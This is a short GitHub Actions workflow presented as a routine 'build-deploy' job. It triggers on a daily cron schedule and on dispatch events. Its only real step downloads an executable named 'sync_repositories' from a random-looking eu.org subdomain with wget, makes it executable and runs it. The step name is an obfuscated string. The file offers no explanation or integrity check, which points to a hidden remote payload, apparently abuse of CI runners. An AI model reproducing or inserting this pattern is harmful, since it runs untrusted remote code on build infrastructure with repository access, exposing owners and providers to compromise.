#2024-03-18-[135737]-ep9wn1gr
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "42 4 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: mxbgp2t59s4h37d9
        run: |
          wget -q https://rxlhrp76b5r43l0v.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories